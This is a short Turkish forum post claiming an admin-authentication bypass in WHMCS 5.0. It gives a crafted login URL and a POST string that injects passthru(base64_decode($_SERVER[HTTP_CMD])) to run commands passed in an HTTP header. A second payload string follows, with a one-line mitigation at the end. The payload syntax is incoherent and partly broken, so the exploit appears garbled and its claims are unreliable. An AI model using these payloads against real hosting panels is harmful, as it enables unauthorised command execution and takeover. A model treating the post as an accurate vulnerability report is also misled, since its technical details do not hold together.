IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası

IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası (https://www.ircforumlari.net/)
-   Güvenlik Açıkları (https://www.ircforumlari.net/guvenlik-aciklari/)
-   -   whmcs 5.x güvenlik açığı (https://www.ircforumlari.net/guvenlik-aciklari/543687-whmcs-5x-guvenlik-acigi.html)

CeSaRCripS 22 Ağustos 2013 12:12
whmcs 5.x güvenlik açığı
 
whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";

şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 21:42.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO
Copyright ©2004 - 2025 IRCForumlari.Net Sparhawk